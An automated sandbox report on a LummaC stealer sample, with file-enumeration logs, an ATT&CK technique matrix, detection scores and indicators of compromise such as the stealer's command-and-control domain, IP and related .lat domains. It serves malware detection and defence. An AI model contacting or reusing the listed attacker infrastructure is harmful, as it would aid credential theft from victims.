                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		311
                Process Injection                		11
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services41
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		311
                Process Injection                		LSASS Memory11
                Virtualization/Sandbox Evasion                		Remote Desktop ProtocolData from Removable Media2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets22
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MPySEh8HaF.exe55%ReversingLabsWin32.Spyware.Lummastealer
                MPySEh8HaF.exe58%VirustotalBrowse
                MPySEh8HaF.exe100%AviraHEUR/AGEN.1309172

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://treehoneyi.click/Y0%Avira URL Cloudsafe
                https://treehoneyi.click/)0%Avira URL Cloudsafe
                https://treehoneyi.click/apiOH0%Avira URL Cloudsafe
                https://treehoneyi.click/api00%Avira URL Cloudsafe
                https://treehoneyi.click:443/apin.txtPK0%Avira URL Cloudsafe
                https://treehoneyi.click/B0%Avira URL Cloudsafe
                https://treehoneyi.click/s0%Avira URL Cloudsafe
                https://treehoneyi.click/h0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                treehoneyi.click
                		172.67.180.113
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  necklacebudi.latfalse
                    		high
                    aspecteirs.latfalse
                      		high
                      energyaffai.latfalse
                        		high
                        treehoneyi.clickfalse
                          		high
                          https://treehoneyi.click/apifalse
                            		high
                            sustainskelet.latfalse
                              		high
                              crosshuaht.latfalse
                                		high
                                rapeflowwj.latfalse
                                  		high
                                  grannyejh.latfalse
                                    		high
                                    discokeyus.latfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://treehoneyi.click/apiOHBitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://html4/loose.dtdMPySEh8HaF.exefalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://treehoneyi.click/)BitLockerToGo.exe, 00000002.00000003.1976536875.0000000002B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://treehoneyi.click/hBitLockerToGo.exe, 00000002.00000002.2099926152.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098966843.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999447521.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999741792.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2000294448.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://treehoneyi.click/sBitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1976957370.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952400564.0000000004E49000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1975918166.0000000004E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://.cssMPySEh8HaF.exefalse
                                                                		high
                                                                https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://treehoneyi.click/api0BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://treehoneyi.click/BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1977772504.0000000004DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://treehoneyi.click/BBitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.c.lencr.org/0BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://x1.i.lencr.org/0BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://treehoneyi.click:443/apin.txtPKBitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.microsofBitLockerToGo.exe, 00000002.00000003.1952092776.0000000004E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000002.00000003.2000003486.0000000004E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://treehoneyi.click:443/apiBitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://treehoneyi.click/YBitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 00000002.00000003.1952172222.0000000004E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://.jpgMPySEh8HaF.exefalse
                                                                                              		high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                172.67.180.113
                                                                                                		treehoneyi.clickUnited States
                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1580844
                                                                                                Start date and time:2024-12-26 12:00:08 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 4m 37s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:5
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:MPySEh8HaF.exe
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:58cffd92455eec9cd613ede591ed6c2c.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                                EGA Information:Failed
                                                                                                HCA Information:Failed
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target BitLockerToGo.exe, PID 7676 because there are no executed function
                                                                                                • Execution Graph export aborted for target MPySEh8HaF.exe, PID 7420 because there are no executed function
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                06:01:25API Interceptor8x Sleep call for process: BitLockerToGo.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                172.67.180.113cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    treehoneyi.clickfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                    • 104.21.91.209
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                    • 104.21.91.209
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                    • 104.21.91.209
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                    • 104.21.91.209
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                    • 172.67.180.113
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                    • 172.67.180.113

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSDotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.27.85
                                                                                                                    67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 104.21.38.84
                                                                                                                    http://booking.extranetguests.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                    • 172.67.220.52
                                                                                                                    ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                    • 104.21.94.92
                                                                                                                    Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.128.61
                                                                                                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 162.159.16.108
                                                                                                                    INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 172.67.167.59
                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
